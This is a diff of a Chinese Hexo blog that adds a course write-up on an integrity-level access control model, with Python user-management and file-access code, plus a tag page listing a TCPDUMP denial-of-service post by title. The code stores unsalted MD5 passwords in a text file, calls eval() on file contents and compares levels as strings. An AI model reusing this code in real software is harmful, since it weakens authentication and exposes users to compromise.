line.strip() listFromLine = line.split(':') name = listFromLine[0] if name == nameIn: numberofLines = -1 passwd = listFromLine[1] if passwd == passwdIn: group = listFromLine[2] print("\n登录成功!\n") if name == 'root': print('root登录') rootUI.show() MainWindow.close() else: urName = nameIn mainUI.lineEdit.setText(urName) mainUI.lineEdit_2.setText(group) mainUI.show() MainWindow.close() else: QMessageBox.warning(self, "警告", "密码错误！", QMessageBox.Yes) self.lineEdit.setFocus() fr.close() return 0 2. 管理员功能实现管理员可以对用户进行增、删、查的操作 增加用户的实现 获取管理员输入的用户名、密码和用户等级 将明文密码转换为md5值 判断输入的账户是否已经存在以及是否为空 如果没有问题，将其存入passwd.txt的末尾 12345678910111213141516171819202122232425262728293031def adduser(self): print('开始添加') name = self.lineEdit_4.text() passwd = self.lineEdit_6.text() md5 = hashlib.md5() md5.update(passwd.encode("utf-8")) passwd = md5.hexdigest() group = self.comboBox.currentText() self.name = name if self.euxit(): if name == '' or passwd == '': QMessageBox.warning(self, "警告", "账号和密码不能为空", QMessageBox.Yes) self.lineEdit.setFocus() else: cur_path = os.getcwd() filename = cur_path + '/etc/passwd.txt' fi = open(filename, 'r+') str = name + ':' + passwd + ':' + group + '\n' print('成功增加用户' + str + '\n') fi.seek(0, 2) fi.write(str) fi.close() else: QMessageBox.warning(self, "警告", "用户已存在", QMessageBox.Yes) self.lineEdit.setFocus() 查询已有用户的实现 从passwd.txt中逐行读出 123456789101112def readuser(self): print('readuser') cur_path = os.getcwd() filename = cur_path + '/etc/passwd.txt' fo = open(filename) arrayofLines = fo.readlines() names = '' for line in arrayofLines: line = line.strip() listFromLine = line.split(':') names = names + listFromLine[0] + '\n' self.textEdit.setPlaceholderText(names) 删除用户的实现 从passwd.txt中逐行读出用户名，并与待删除用户比较，如果相同，则删除该行 12345678910111213141516171819def rmuser(self): print(1) cur_path = os.getcwd() filename = cur_path + '/etc/passwd.txt' rmName = self.lineEdit.text() with open(filename, 'r',encoding="utf-8") as r: lines = r.readlines() lenl = len(lines) with open(filename, 'w',encoding="utf-8") as w: for line in lines: l = line.strip() listFromLine = l.split(':') if rmName == listFromLine[0]: print('删除用户' + rmName) continue if line == '\n': print('find换行') line = '' w.write(line) 3. 普通用户功能实现普通用户可以完成对合法权限文件的读取、增加内容（上写下读）以及创建文件的操作 读取文件内容 双击文件名获取选中文件和当前用户的完整性级别如果用户的级别低于文件，则读取文件内容 123456789101112131415161718192021def readfile(self): dict = self.getGrade() fgrade = str(dict[self.file_path]) ugrade = self.lineEdit_2.text() if ugrade &gt;= fgrade: print(ugrade+ ' 正在读取 '+fgrade) filename = self.file_path print(filename) fr = open(filename) lines = '' arrayofLines = fr.readlines() for line in arrayofLines: lines += line self.textEdit.setText(lines) print('读取成功\n') else: QMessageBox.warning(self, "警告", "您的用户等级太高", QMessageBox.Yes) self.lineEdit.setFocus() 增加文件内容 双击文件名获取选中文件和当前用户的完整性级别如果用户的级别高于文件，则写入文件内容 123456789101112131415161718def writefile(self): dict = self.getGrade() fgrade = dict[self.file_path] ugrade = self.lineEdit_2.text() print(ugrade + ' 正在写入 ' + fgrade) if ugrade &lt;= fgrade: filename = self.file_path str = self.textEdit.toPlainText() print(str) fo = open(filename, 'r+') fo.seek(0, 2) fo.write(str) else: QMessageBox.warning(self, "警告", "您的用户等级太低", QMessageBox.Yes) self.lineEdit.setFocus() 创建文件 获取当前用户名和输入的文件名在当前路径下创建名为用户名的文件并对新创建的文件与用户等级建立字典，新文件路径为key，用户等级为value这个字典方便读写时判断等级高低 123456789101112131415161718192021222324def touchfile(self): urName = self.lineEdit.text() filename = self.lineEdit_4.text() cur_path = os.getcwd() new_path = os.path.join(cur_path + '/file', urName) print(urName) if os.path.exists(new_path) == False: os.mkdir(new_path) os.chdir(new_path) fr = open(filename, 'w') key = (new_path + '/' + filename).replace('\\', '/') fr.close() os.chdir(cur_path) fa = open('./etc/ac.txt', 'r') a = fa.read() if a == '': dict = &#123;&#125; else: dict = eval(a) dict[key] = self.lineEdit_2.text() fr = open('./etc/ac.txt', 'w') fr.write(str(dict)) fr.close() fa.close() 五、心得体会：六、改进部分：]]></content>
+      <categories>
+        <category>理论学习</category>
+      </categories>
+      <tags>
+        <tag>模型实现</tag>
+        <tag>python</tag>
+        <tag>访问控制</tag>
+      </tags>
+  </entry>
+  <entry>
+    <title><![CDATA[Hello World]]></title>
+    <url>%2F2000%2F01%2F01%2Fhello-world%2F</url>
+    <content type="text"><![CDATA[你好！我是混元霹雳手]]></content>
+  </entry>
 </search>
diff --git a/sitemap.xml b/sitemap.xml
index 7b06a71a..50436038 100644
--- a/sitemap.xml
+++ b/sitemap.xml
@@ -4,7 +4,7 @@
   <url>
     <loc>https://cool-y.github.io/2019/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/</loc>
     
-    <lastmod>2019-03-23T04:35:48.091Z</lastmod>
+    <lastmod>2019-03-23T04:40:15.773Z</lastmod>
     
   </url>
   
diff --git a/tags/QQ/index.html b/tags/QQ/index.html
index fd433863..7f44b335 100644
--- a/tags/QQ/index.html
+++ b/tags/QQ/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/SSH/index.html b/tags/SSH/index.html
index 2198aa94..85492c92 100644
--- a/tags/SSH/index.html
+++ b/tags/SSH/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/TCPDUMP/index.html b/tags/TCPDUMP/index.html
new file mode 100644
index 00000000..e730747c
--- /dev/null
+++ b/tags/TCPDUMP/index.html
@@ -0,0 +1,1106 @@
+<!DOCTYPE html>
+
+
+
+  
+
+
+<html class="theme-next gemini use-motion" lang="zh-Hans">
+<head><meta name="generator" content="Hexo 3.8.0">
+  <meta charset="UTF-8">
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
+<meta name="theme-color" content="#222">
+
+
+
+
+
+
+
+
+
+<meta http-equiv="Cache-Control" content="no-transform">
+<meta http-equiv="Cache-Control" content="no-siteapp">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
+
+
+
+
+
+
+
+<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
+
+<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
+
+
+  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
+
+
+
+
+
+  <meta name="keywords" content="Hexo, NexT">
+
+
+
+
+
+
+
+
+
+
+<meta property="og:type" content="website">
+<meta property="og:title" content="混元霹雳手">
+<meta property="og:url" content="https://cool-y.github.io/tags/TCPDUMP/index.html">
+<meta property="og:site_name" content="混元霹雳手">
+<meta property="og:locale" content="zh-Hans">
+<meta name="twitter:card" content="summary">
+<meta name="twitter:title" content="混元霹雳手">
+
+
+
+<script type="text/javascript" id="hexo.configurations">
+  var NexT = window.NexT || {};
+  var CONFIG = {
+    root: '/',
+    scheme: 'Gemini',
+    version: '5.1.4',
+    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
+    fancybox: true,
+    tabs: true,
+    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
+    duoshuo: {
+      userId: '0',
+      author: '博主'
+    },
+    algolia: {
+      applicationID: '',
+      apiKey: '',
+      indexName: '',
+      hits: {"per_page":10},
+      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
+    }
+  };
+</script>
+
+
+
+  <link rel="canonical" href="https://cool-y.github.io/tags/TCPDUMP/">
+
+
+
+
+
+  <title>标签: TCPDUMP | 混元霹雳手</title>
+  
+
+
+
+
+
+
+
+
+</head>
+
+<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
+
+  
+  
+    
+  
+
+  <div class="container sidebar-position-left ">
+    <div class="headband"></div>
+
+    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
+      <div class="header-inner"><div class="site-brand-wrapper">
+  <div class="site-meta ">
+    
+
+    <div class="custom-logo-site-title">
+      <a href="/" class="brand" rel="start">
+        <span class="logo-line-before"><i></i></span>
+        <span class="site-title">混元霹雳手</span>
+        <span class="logo-line-after"><i></i></span>
+      </a>
+    </div>
+      
+        <p class="site-subtitle"></p>
+      
+  </div>
+
+  <div class="site-nav-toggle">
+    <button>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+    </button>
+  </div>
+</div>
+
+<nav class="site-nav">
+  
+
+  
+    <ul id="menu" class="menu">
+      
+        
+        <li class="menu-item menu-item-home">
+          <a href="/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
+            
+            首页
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-about">
+          <a href="/about/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
+            
+            关于
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-tags">
+          <a href="/tags/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
+            
+            标签
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-categories">
+          <a href="/categories/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
+            
+            分类
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-archives">
+          <a href="/archives/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
+            
+            归档
+          </a>
+        </li>
+      
+
+      
+        <li class="menu-item menu-item-search">
+          
+            <a href="javascript:;" class="popup-trigger">
+          
+            
+              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
+            
+            搜索
+          </a>
+        </li>
+      
+    </ul>
+  
+
+  
+    <div class="site-search">
+      
+  <div class="popup search-popup local-search-popup">
+  <div class="local-search-header clearfix">
+    <span class="search-icon">
+      <i class="fa fa-search"></i>
+    </span>
+    <span class="popup-btn-close">
+      <i class="fa fa-times-circle"></i>
+    </span>
+    <div class="local-search-input-wrapper">
+      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
+    </div>
+  </div>
+  <div id="local-search-result"></div>
+</div>
+
+
+
+    </div>
+  
+</nav>
+
+
+
+ </div>
+    </header>
+
+    <main id="main" class="main">
+      <div class="main-inner">
+        <div class="content-wrap">
+          <div id="content" class="content">
+            
+
+  
+  
+  
+  <div class="post-block tag">
+
+    <div id="posts" class="posts-collapse">
+      <div class="collection-title">
+        <h1>TCPDUMP<small>标签</small>
+        </h1>
+      </div>
+
+      
+        
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2019/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2019-12-25T12:26:05+08:00" content="2019-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
+    </div>
+
+  </div>
+  
+  
+  
+
+  
+
+
+          </div>
+          
+
+
+          
+
+        </div>
+        
+          
+  
+  <div class="sidebar-toggle">
+    <div class="sidebar-toggle-line-wrap">
+      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
+    </div>
+  </div>
+
+  <aside id="sidebar" class="sidebar">
+    
+    <div class="sidebar-inner">
+
+      
+
+      
+
+      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
+        <div class="site-overview">
+          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
+            
+              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
+            
+              <p class="site-author-name" itemprop="name">Cool-Y</p>
+              <p class="site-description motion-element" itemprop="description"></p>
+          </div>
+
+          <nav class="site-state motion-element">
+
+            
+              <div class="site-state-item site-state-posts">
+              
+                <a href="/archives/">
+              
+                  <span class="site-state-item-count">7</span>
+                  <span class="site-state-item-name">日志</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-categories">
+                <a href="/categories/index.html">
+                  <span class="site-state-item-count">5</span>
+                  <span class="site-state-item-name">分类</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-tags">
+                <a href="/tags/index.html">
+                  <span class="site-state-item-count">16</span>
+                  <span class="site-state-item-name">标签</span>
+                </a>
+              </div>
+            
+
+          </nav>
+
+          
+
+          
+            <div class="links-of-author motion-element">
+                
+                  <span class="links-of-author-item">
+                    <a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
+                      
+                        <i class="fa fa-fw fa-github"></i>GitHub</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="http://weibo.com/HanYanOpenFire" target="_blank" title="Weibo">
+                      
+                        <i class="fa fa-fw fa-weibo"></i>Weibo</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
+                      
+                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
+                      
+                        <i class="fa fa-fw fa-instagram"></i>Instagram</a>
+                  </span>
+                
+            </div>
+          
+
+          
+          
+
+          
+          
+
+          
+
+        </div>
+      </section>
+
+      
+
+      
+
+    </div>
+  </aside>
+
+
+        
+      </div>
+    </main>
+
+    <footer id="footer" class="footer">
+      <div class="footer-inner">
+        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
+  <span class="with-love">
+    <i class="fa fa-user"></i>
+  </span>
+  <span class="author" itemprop="copyrightHolder">Cool-Y</span>
+
+  
+    <span class="post-meta-divider">|</span>
+    <span class="post-meta-item-icon">
+      <i class="fa fa-area-chart"></i>
+    </span>
+    
+    <span title="Site words total count">11.1k</span>
+  
+</div>
+
+
+  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
+
+
+
+
+
+
+
+
+        
+<div class="busuanzi-count">
+    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
+
+  
+    <span class="site-uv">
+      <i class="fa fa-user"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
+      
+    </span>
+  
+
+  
+    <span class="site-pv">
+      <i class="fa fa-eye"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
+      
+    </span>
+  
+</div>
+
+
+
+
+
+
+
+
+        
+      </div>
+    </footer>
+
+    
+      <div class="back-to-top">
+        <i class="fa fa-arrow-up"></i>
+        
+      </div>
+    
+
+    
+
+  </div>
+
+  
+
+<script type="text/javascript">
+  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
+    window.Promise = null;
+  }
+</script>
+
+
+
+
+
+
+
+
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
+  
+
+
+  
+
+
+  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
+
+
+
+  
+  
+
+
+  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
+
+
+
+  
+
+  
+
+
+  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
+
+
+
+  
+
+
+  
+
+
+
+
+	
+
+
+
+
+
+  
+
+
+
+
+
+  
+
+
+
+
+
+
+
+<!-- LOCAL: You can save these files to your site and update links -->
+    
+        
+        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
+        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
+    
+<!-- END LOCAL -->
+
+    
+
+    
+
+
+
+
+
+
+
+  
+
+  <script type="text/javascript">
+    // Popup Window;
+    var isfetched = false;
+    var isXml = true;
+    // Search DB path;
+    var search_path = "search.xml";
+    if (search_path.length === 0) {
+      search_path = "search.xml";
+    } else if (/json$/i.test(search_path)) {
+      isXml = false;
+    }
+    var path = "/" + search_path;
+    // monitor main search box;
+
+    var onPopupClose = function (e) {
+      $('.popup').hide();
+      $('#local-search-input').val('');
+      $('.search-result-list').remove();
+      $('#no-result').remove();
+      $(".local-search-pop-overlay").remove();
+      $('body').css('overflow', '');
+    }
+
+    function proceedsearch() {
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
+        .css('overflow', 'hidden');
+      $('.search-popup-overlay').click(onPopupClose);
+      $('.popup').toggle();
+      var $localSearchInput = $('#local-search-input');
+      $localSearchInput.attr("autocapitalize", "none");
+      $localSearchInput.attr("autocorrect", "off");
+      $localSearchInput.focus();
+    }
+
+    // search function;
+    var searchFunc = function(path, search_id, content_id) {
+      'use strict';
+
+      // start loading animation
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
+          '<div id="search-loading-icon">' +
+          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
+          '</div>' +
+          '</div>')
+        .css('overflow', 'hidden');
+      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
+
+      $.ajax({
+        url: path,
+        dataType: isXml ? "xml" : "json",
+        async: true,
+        success: function(res) {
+          // get the contents from search data
+          isfetched = true;
+          $('.popup').detach().appendTo('.header-inner');
+          var datas = isXml ? $("entry", res).map(function() {
+            return {
+              title: $("title", this).text(),
+              content: $("content",this).text(),
+              url: $("url" , this).text()
+            };
+          }).get() : res;
+          var input = document.getElementById(search_id);
+          var resultContent = document.getElementById(content_id);
+          var inputEventFunction = function() {
+            var searchText = input.value.trim().toLowerCase();
+            var keywords = searchText.split(/[\s\-]+/);
+            if (keywords.length > 1) {
+              keywords.push(searchText);
+            }
+            var resultItems = [];
+            if (searchText.length > 0) {
+              // perform local searching
+              datas.forEach(function(data) {
+                var isMatch = false;
+                var hitCount = 0;
+                var searchTextCount = 0;
+                var title = data.title.trim();
+                var titleInLowerCase = title.toLowerCase();
+                var content = data.content.trim().replace(/<[^>]+>/g,"");
+                var contentInLowerCase = content.toLowerCase();
+                var articleUrl = decodeURIComponent(data.url);
+                var indexOfTitle = [];
+                var indexOfContent = [];
+                // only match articles with not empty titles
+                if(title != '') {
+                  keywords.forEach(function(keyword) {
+                    function getIndexByWord(word, text, caseSensitive) {
+                      var wordLen = word.length;
+                      if (wordLen === 0) {
+                        return [];
+                      }
+                      var startPosition = 0, position = [], index = [];
+                      if (!caseSensitive) {
+                        text = text.toLowerCase();
+                        word = word.toLowerCase();
+                      }
+                      while ((position = text.indexOf(word, startPosition)) > -1) {
+                        index.push({position: position, word: word});
+                        startPosition = position + wordLen;
+                      }
+                      return index;
+                    }
+
+                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
+                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
+                  });
+                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
+                    isMatch = true;
+                    hitCount = indexOfTitle.length + indexOfContent.length;
+                  }
+                }
+
+                // show search results
+
+                if (isMatch) {
+                  // sort index by position of keyword
+
+                  [indexOfTitle, indexOfContent].forEach(function (index) {
+                    index.sort(function (itemLeft, itemRight) {
+                      if (itemRight.position !== itemLeft.position) {
+                        return itemRight.position - itemLeft.position;
+                      } else {
+                        return itemLeft.word.length - itemRight.word.length;
+                      }
+                    });
+                  });
+
+                  // merge hits into slices
+
+                  function mergeIntoSlice(text, start, end, index) {
+                    var item = index[index.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    var hits = [];
+                    var searchTextCountInSlice = 0;
+                    while (position + word.length <= end && index.length != 0) {
+                      if (word === searchText) {
+                        searchTextCountInSlice++;
+                      }
+                      hits.push({position: position, length: word.length});
+                      var wordEnd = position + word.length;
+
+                      // move to next position of hit
+
+                      index.pop();
+                      while (index.length != 0) {
+                        item = index[index.length - 1];
+                        position = item.position;
+                        word = item.word;
+                        if (wordEnd > position) {
+                          index.pop();
+                        } else {
+                          break;
+                        }
+                      }
+                    }
+                    searchTextCount += searchTextCountInSlice;
+                    return {
+                      hits: hits,
+                      start: start,
+                      end: end,
+                      searchTextCount: searchTextCountInSlice
+                    };
+                  }
+
+                  var slicesOfTitle = [];
+                  if (indexOfTitle.length != 0) {
+                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
+                  }
+
+                  var slicesOfContent = [];
+                  while (indexOfContent.length != 0) {
+                    var item = indexOfContent[indexOfContent.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    // cut out 100 characters
+                    var start = position - 20;
+                    var end = position + 80;
+                    if(start < 0){
+                      start = 0;
+                    }
+                    if (end < position + word.length) {
+                      end = position + word.length;
+                    }
+                    if(end > content.length){
+                      end = content.length;
+                    }
+                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
+                  }
+
+                  // sort slices in content by search text's count and hits' count
+
+                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
+                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
+                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
+                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
+                      return sliceRight.hits.length - sliceLeft.hits.length;
+                    } else {
+                      return sliceLeft.start - sliceRight.start;
+                    }
+                  });
+
+                  // select top N slices in content
+
+                  var upperBound = parseInt('1');
+                  if (upperBound >= 0) {
+                    slicesOfContent = slicesOfContent.slice(0, upperBound);
+                  }
+
+                  // highlight title and content
+
+                  function highlightKeyword(text, slice) {
+                    var result = '';
+                    var prevEnd = slice.start;
+                    slice.hits.forEach(function (hit) {
+                      result += text.substring(prevEnd, hit.position);
+                      var end = hit.position + hit.length;
+                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
+                      prevEnd = end;
+                    });
+                    result += text.substring(prevEnd, slice.end);
+                    return result;
+                  }
+
+                  var resultItem = '';
+
+                  if (slicesOfTitle.length != 0) {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
+                  } else {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
+                  }
+
+                  slicesOfContent.forEach(function (slice) {
+                    resultItem += "<a href='" + articleUrl + "'>" +
+                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
+                      "...</p>" + "</a>";
+                  });
+
+                  resultItem += "</li>";
+                  resultItems.push({
+                    item: resultItem,
+                    searchTextCount: searchTextCount,
+                    hitCount: hitCount,
+                    id: resultItems.length
+                  });
+                }
+              })
+            };
+            if (keywords.length === 1 && keywords[0] === "") {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
+            } else if (resultItems.length === 0) {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
+            } else {
+              resultItems.sort(function (resultLeft, resultRight) {
+                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
+                  return resultRight.searchTextCount - resultLeft.searchTextCount;
+                } else if (resultLeft.hitCount !== resultRight.hitCount) {
+                  return resultRight.hitCount - resultLeft.hitCount;
+                } else {
+                  return resultRight.id - resultLeft.id;
+                }
+              });
+              var searchResultList = '<ul class=\"search-result-list\">';
+              resultItems.forEach(function (result) {
+                searchResultList += result.item;
+              })
+              searchResultList += "</ul>";
+              resultContent.innerHTML = searchResultList;
+            }
+          }
+
+          if ('auto' === 'auto') {
+            input.addEventListener('input', inputEventFunction);
+          } else {
+            $('.search-icon').click(inputEventFunction);
+            input.addEventListener('keypress', function (event) {
+              if (event.keyCode === 13) {
+                inputEventFunction();
+              }
+            });
+          }
+
+          // remove loading animation
+          $(".local-search-pop-overlay").remove();
+          $('body').css('overflow', '');
+
+          proceedsearch();
+        }
+      });
+    }
+
+    // handle and trigger popup window;
+    $('.popup-trigger').click(function(e) {
+      e.stopPropagation();
+      if (isfetched === false) {
+        searchFunc(path, 'local-search-input', 'local-search-result');
+      } else {
+        proceedsearch();
+      };
+    });
+
+    $('.popup-btn-close').click(onPopupClose);
+    $('.popup').click(function(e){
+      e.stopPropagation();
+    });
+    $(document).on('keyup', function (event) {
+      var shouldDismissSearchPopup = event.which === 27 &&
+        $('.search-popup').is(':visible');
+      if (shouldDismissSearchPopup) {
+        onPopupClose();
+      }
+    });
+  </script>
+
+
+
+
+
+  
+
+  
+  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
+  <script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
+  <script>
+    function showTime(Counter) {
+      var query = new AV.Query(Counter);
+      var entries = [];
+      var $visitors = $(".leancloud_visitors");
+
+      $visitors.each(function () {
+        entries.push( $(this).attr("id").trim() );
+      });
+
+      query.containedIn('url', entries);
+      query.find()
+        .done(function (results) {
+          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
+
+          if (results.length === 0) {
+            $visitors.find(COUNT_CONTAINER_REF).text(0);
+            return;
+          }
+
+          for (var i = 0; i < results.length; i++) {
+            var item = results[i];
+            var url = item.get('url');
+            var time = item.get('time');
+            var element = document.getElementById(url);
+
+            $(element).find(COUNT_CONTAINER_REF).text(time);
+          }
+          for(var i = 0; i < entries.length; i++) {
+            var url = entries[i];
+            var element = document.getElementById(url);
+            var countSpan = $(element).find(COUNT_CONTAINER_REF);
+            if( countSpan.text() == '') {
+              countSpan.text(0);
+            }
+          }
+        })
+        .fail(function (object, error) {
+          console.log("Error: " + error.code + " " + error.message);
+        });
+    }
+
+    function addCount(Counter) {
+      var $visitors = $(".leancloud_visitors");
+      var url = $visitors.attr('id').trim();
+      var title = $visitors.attr('data-flag-title').trim();
+      var query = new AV.Query(Counter);
+
+      query.equalTo("url", url);
+      query.find({
+        success: function(results) {
+          if (results.length > 0) {
+            var counter = results[0];
+            counter.fetchWhenSave(true);
+            counter.increment("time");
+            counter.save(null, {
+              success: function(counter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(counter.get('time'));
+              },
+              error: function(counter, error) {
+                console.log('Failed to save Visitor num, with error message: ' + error.message);
+              }
+            });
+          } else {
+            var newcounter = new Counter();
+            /* Set ACL */
+            var acl = new AV.ACL();
+            acl.setPublicReadAccess(true);
+            acl.setPublicWriteAccess(true);
+            newcounter.setACL(acl);
+            /* End Set ACL */
+            newcounter.set("title", title);
+            newcounter.set("url", url);
+            newcounter.set("time", 1);
+            newcounter.save(null, {
+              success: function(newcounter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
+              },
+              error: function(newcounter, error) {
+                console.log('Failed to create');
+              }
+            });
+          }
+        },
+        error: function(error) {
+          console.log('Error:' + error.code + " " + error.message);
+        }
+      });
+    }
+
+    $(function() {
+      var Counter = AV.Object.extend("Counter");
+      if ($('.leancloud_visitors').length == 1) {
+        addCount(Counter);
+      } else if ($('.post-title-link').length > 1) {
+        showTime(Counter);
+      }
+    });
+  </script>
+
+
+
+  
+
+  
+
+  
+  
+
+  
+
+  
+
+  
+
+</body>
+</html>
